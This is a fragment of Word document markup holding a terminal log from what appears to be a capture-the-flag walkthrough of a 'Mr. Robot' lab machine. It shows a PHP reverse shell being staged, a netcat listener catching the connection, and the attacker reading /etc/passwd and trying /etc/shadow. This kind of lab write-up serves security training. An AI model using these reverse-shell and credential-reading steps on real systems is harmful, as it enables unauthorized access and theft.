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7D83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1828D419" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">└─$ cd Desktop                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D7DD3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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B0F114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611D559E" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">└─$ cd Mr.\ Robot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A87EF" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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EDA721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~/Desktop/Mr. Robot]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A316585" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>└─$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410728F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  wordlists.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6607D095" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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D9CEE7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~/Desktop/Mr. Robot]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3478A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">└─$ cp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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webshells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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C47E2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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9E7F45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~/Desktop/Mr. Robot]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56854F8F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>└─$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A0474" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  wordlists.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999B85F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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42F35E" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A0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~/Desktop/Mr. Robot]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F5BB4" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDDA49" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>listening on [any] 1234 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC10D1" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>connect to [10.0.2.15] from (UNKNOWN) [10.0.2.7] 33257</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DE3CA" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC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18988943" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve"> 09:38:59 up 18 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>min,  0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> users,  load average: 0.00, 0.01, 0.05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED690C1" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C058A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED7FA2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: 0: can't access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; job control turned off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A465778" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57968CD4" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A592FB" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C048B96" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BE29E" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06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14:paraId="26E19B3F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC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380D7D2E" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78881783" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAF993" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12452EFB" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03281DF7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35124AD9" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE3091" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629EAF8" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6127D9B9" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initrd.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50D87FCC" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB9D0A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB439A2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lost+found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6313F41C" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88C48B" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CE8D154" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB34C45" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81DB38" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3B941" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A6B827" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50F352DC" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21BE9F96" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD09EC" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E7260B4" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54F4952F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C03F7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlinuz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5600F70B" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E123271" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>root:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2603E7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>daemon:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:1:1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>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C70694C" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>bin:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:2:2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>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F843AD0" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>sys:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:3:3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>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D10BDD" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>sync:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:4:65534</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:sync:/bin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0F002" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"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8C44496" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"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C87E963" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"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5114BF6" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"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39C03C5" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53496984" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r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261DBB3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>proxy:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:13:13</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:proxy:/bin:/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F362756" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>www-data:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:33:33</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:www-data:/var/www:/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B8FE8C2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r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AE11E22" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"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94DFF61" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>irc:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:39:39</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:ircd:/var/run/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04AFDFD" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>gnats:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:41:41</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:Gnats Bug-Reporting System (admin):/var/lib/gnats:/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7FE8CE8" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>nobody:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:65534:65534</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:nobody:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nonexistent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B706A64" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>libuuid:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:100:101</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libuuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE2417" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>syslog:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:101:104</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/home/syslog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB752D" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>sshd:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:102:65534</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/var/run/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd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5BB0BB3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>ftp:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:103:106</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:ftp daemon,,,:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ftp:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCAF64" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>bitnamiftp:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:1000:1000</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bitnami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/apps:/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bitnami_ftp_false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78A14F3D" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>mysql:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:1001:1001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69D50A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>varnish:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:999:999</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/home/varnish:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1EC076" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>robot:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x:1002:1002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>::/home/robot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA7B49" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE86248" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: /etc/shadow: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F37EE" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E15BCA" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8AFBF3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F04928" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3376FE" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68EAF4" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A7612" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initrd.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A606BCD" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20147A75" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA8BF5" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lost+found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45C80B59" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26682AE7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0542A408" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B7EA7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3056ABE7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D9197" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B970B13" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C909ABD" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="128D1F67" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA649F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
